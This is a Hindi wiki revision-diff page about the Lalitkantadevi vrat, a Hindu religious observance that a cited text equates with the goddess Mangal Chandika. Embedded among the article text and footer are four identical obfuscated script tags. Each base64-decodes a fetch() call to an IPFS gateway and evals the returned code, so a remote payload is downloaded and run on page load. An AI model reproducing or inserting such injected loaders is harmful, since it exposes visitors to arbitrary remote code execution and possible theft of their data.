Difference between revisions of "ललितकान्तादेवी व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
*यह व्रत मंगला चण्डिका देवी का ही है। <ref>तिथितत्व (41)</ref> ने [[कालिकापुराण]] को उद्धृत करते हुआ कहा है कि [[मंगल चण्डिका]] ही ललितकान्तादेवी हैं, जिसके दो हाथ होते हैं, जो गोरी होती हैं, लाल कमल के फूल पर विराजमान रहती हैं।  
+
*यह व्रत मंगला चण्डिका देवी का ही है।
 +
*तिथितत्व<ref>तिथितत्व (41)</ref> ने [[कालिकापुराण]] को उद्धृत करते हुआ कहा है कि [[मंगल चण्डिका]] ही ललितकान्तादेवी हैं, जिसके दो हाथ होते हैं, जो गोरी होती हैं, लाल कमल के फूल पर विराजमान रहती हैं।  
 
 
 
 
 
{{लेख प्रगति
 
{{लेख प्रगति

Revision as of 07:19, 15 September 2010

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullakhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat mangala chandika devi ka hi hai.
  • tithitatv[1] ne kalikapuran ko uddhrit karate hua kaha hai ki mangal chandika hi lalitakantadevi haian, jisake do hath hote haian, jo gori hoti haian, lal kamal ke phool par virajaman rahati haian.

 

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. tithitatv (41)

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>